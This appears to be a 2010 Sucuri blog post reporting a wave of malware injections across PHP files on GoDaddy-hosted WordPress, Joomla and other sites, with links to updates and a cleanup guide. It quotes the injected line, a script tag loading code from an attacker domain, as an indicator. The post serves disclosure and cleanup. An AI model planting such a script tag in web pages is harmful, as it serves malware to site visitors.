Update2: Reply from GoDaddy: https://blog.sucuri.net/2010/05/reply-from-godaddy-regarding-latest.html
Update: Code used to exploit found: https://blog.sucuri.net/2010/05/found-code-used-to-inject-malware-at.html
< script src =”http://holasionweb.com/oo.php”>< /script>
The changes were all made this morning between 2am and 3am, changing all PHP files with this new code.
All the sites we checked so far were updated (WordPress 2.9.2) and using good permissions. Plus. not all of them were using WordPress. I don’t want to see the “users were not updated” excuse again, please. GoDaddy, any ideas to what is going on?
Note that our previous solution will still clean it up: https://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html
The details are all the same from the previous attack, just using a new host (and new victims):
Notice that this is not related to one specific platform. Most of the sites we checked were using WordPress, but some were on Joomla or using other web applications. Plus, very annoying since all the PHP files get modified.
As always, if you are having difficulties getting your site cleanup, send us an email at firstname.lastname@example.org or visit our site: http://sucuri.net. We can get your sites clean up right away.
Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.